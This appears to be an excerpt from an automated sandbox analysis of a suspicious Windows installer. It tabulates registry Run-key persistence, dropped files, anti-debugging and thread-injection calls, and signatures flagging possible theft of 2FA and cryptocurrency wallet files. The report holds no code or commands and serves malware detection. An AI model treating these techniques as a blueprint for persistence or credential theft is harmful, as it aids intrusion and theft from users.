| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{580243BF-3CEE-4131-A599-C6FED66BEB1B}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{251AD013-20AD-4C3F-8FE2-F66A429B4819}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8F1C46F8-E697-4175-B240-CDE682A4BA2D}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{17BE78EE-B40A-4B9E-835F-38EC62F9D479}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D5599B6B-FA0C-45B5-8309-853B003EA412}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{580243BF-3CEE-4131-A599-C6FED66BEB1B}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D372F21-E6DA-4B82-881A-79F6CA6B6AE1}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{03141A2A-5C3A-458E-ABEC-0812AD7FF497}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{376BE474-56D4-4177-BB4E-5610156F36C8}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\CLSID\{b1cfdc44-dff4-204c-e500-42a98fc246ba}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\OneLaunch\\5.17.4\\onelaunch.exe\" -ToastActivated" | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\onelaunch.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F6D29500-933C-447C-9D88-9D814AF73808}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{376BE474-56D4-4177-BB4E-5610156F36C8}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9DAB0CA5-AE19-41AE-955C-41DD44C52697}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{57CE581A-0CB6-4266-9CA0-19364C90A0B3}\InprocServer32\ = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\mbshlext.dll" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{b1cfdc44-dff4-204c-e500-42a98fc246ba}\LocalServer32 | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\onelaunch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F415899A-1576-4C8B-BC9F-4854781F8A20}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
Accesses 2FA software files, possible credential harvesting
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Local\Temp\is-0CG1L.tmp\OneLaunch Setup_3x8a5.tmp | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Web Companion = "C:\\Users\\Admin\\AppData\\Roaming\\Lavasoft\\Web Companion\\Application\\WebCompanion.exe --minimize " | C:\Users\Admin\AppData\Roaming\Lavasoft\Web Companion\Application\WebCompanion.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleChromeAutoLaunch_822E9BCF957816ED0183A9A1E348BDB1 = "\"C:\\Users\\Admin\\AppData\\Local\\OneLaunch\\5.17.4\\chromium\\chromium.exe\" --no-startup-window /prefetch:5" | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" | C:\ProgramData\19965126155501944123.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneLaunch = "C:\\Users\\Admin\\AppData\\Local\\OneLaunch\\5.17.4\\onelaunch.exe" | C:\Users\Admin\AppData\Local\Temp\is-0CG1L.tmp\OneLaunch Setup_3x8a5.tmp | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneLaunchChromium = "C:\\Users\\Admin\\AppData\\Local\\OneLaunch\\5.17.4\\ChromiumStartupProxy.exe" | C:\Users\Admin\AppData\Local\Temp\is-0CG1L.tmp\OneLaunch Setup_3x8a5.tmp | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneLaunch = "C:\\Users\\Admin\\AppData\\Local\\OneLaunch\\5.17.4\\onelaunch.exe /startedFrom=registry" | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\onelaunch.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneLaunchChromium = "C:\\Users\\Admin\\AppData\\Local\\OneLaunch\\5.17.4\\ChromiumStartupProxy.exe --tab-trigger=SystemStart" | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\onelaunch.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\19965126155501944123.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Detected potential entity reuse from brand google.
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\38D10539991D1B84467F968981C3969D_C92678066E2B4B4986BC7641EEC08637 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\117308CCCD9C93758827D7CC85BB135E | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FA0E447C3E79584EC91182C66BBD2DB7 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8890A77645B73478F5B1DED18ACBF795_C090A8C88B266C6FF99A97210E92B44D | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DA3B6E45325D5FFF28CF6BAD6065C907_FBEAFB4EE7383EC8E0A3A2C1EC7FCEAC | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\229169D96B9C20761B929D428962A0A2_FC65190A8D1232A1711F16F9F20C5149 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\38D10539991D1B84467F968981C3969D_C92678066E2B4B4986BC7641EEC08637 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\572BF21E454637C9F000BE1AF9B1E1A9 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\572BF21E454637C9F000BE1AF9B1E1A9 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_6E4F36431D86962EFD432400DF65AC90 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FA0E447C3E79584EC91182C66BBD2DB7 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1B1401C7EC8E96BC79CBFD92F9DF762D_E35D496D1CD0B884BEBCAFED0FE61600 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\229169D96B9C20761B929D428962A0A2_FC65190A8D1232A1711F16F9F20C5149 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_6E4F36431D86962EFD432400DF65AC90 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\117308CCCD9C93758827D7CC85BB135E | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8890A77645B73478F5B1DED18ACBF795_C090A8C88B266C6FF99A97210E92B44D | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DA3B6E45325D5FFF28CF6BAD6065C907_FBEAFB4EE7383EC8E0A3A2C1EC7FCEAC | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1B1401C7EC8E96BC79CBFD92F9DF762D_E35D496D1CD0B884BEBCAFED0FE61600 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\19965126155501944123.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 7432 set thread context of 584 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\System32\conhost.exe |
| PID 7432 set thread context of 2900 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\System32\conhost.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls\Styles\Base\ToolBarStyle.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls\Styles\Desktop\TableViewStyle.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\ComboBox.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Fusion\TextField.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Imagine\ToolTip.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\api-ms-win-core-profile-l1-1-0.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\api-ms-win-crt-string-l1-1-0.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls\MenuBar.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Universal\MenuBarItem.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-22.exe | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-11.exe | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Material\Button.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Material\SliderHandle.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Material\ToolTip.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\ToolButton.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Dialogs\plugins.qmltypes | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Templates.2\qtquicktemplates2plugin.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-13.exe | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls\Styles\Desktop\FocusFrameStyle.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Fusion\SwitchIndicator.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Imagine\ToolSeparator.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Material\Switch.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Material\VerticalHeaderView.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Universal\plugins.qmltypes | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files (x86)\chrome_ComponentUnpacker_BeginUnzipping6068_1008819595\manifest.fingerprint | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQml\Models.2\modelsplugin.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls\Styles\Desktop\SwitchStyle.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Imagine\ScrollBar.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Imagine\SwitchDelegate.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Material\PageIndicator.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\MenuItem.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\TextArea.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Dialogs\DefaultColorDialog.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\Qt5Quick.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls\Private\StackViewSlideDelegate.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Fusion\GroupBox.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\MbamBgNativeMsg.exe | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Material\SwipeDelegate.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\resources\icudtl.dat | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-26.exe | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls\Private\ModalPopupBehavior.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\DialogButtonBox.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Imagine\plugins.qmltypes | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Dialogs\qml\icons.ttf | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\Qt5WebEngineCore.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\libEGL.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-31.exe | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Fusion\SliderHandle.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Material\plugins.qmltypes | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Material\RectangularGlow.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls\Private\TableViewSelection.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls\Private\TextSingleton.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Fusion\Pane.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Fusion\VerticalHeaderView.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Imagine\BusyIndicator.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\mbamelam.sys | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\Qt5XmlPatterns.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls\Private\MenuItemSubControls.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtWebEngineProcess.exe | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\sdk\MBAMSwissArmy.inf | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-10.exe | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Material\BoxShadow.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\ScrollIndicator.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\security\logs\scecomp.log | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Downloads\FILES-S0ft\Setup32x64.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Downloads\FILES-S0ft\Setup32x64.exe | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\mbamtray.exe = "11000" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\mbam.exe = "11000" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\mbamtray.exe = "11000" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
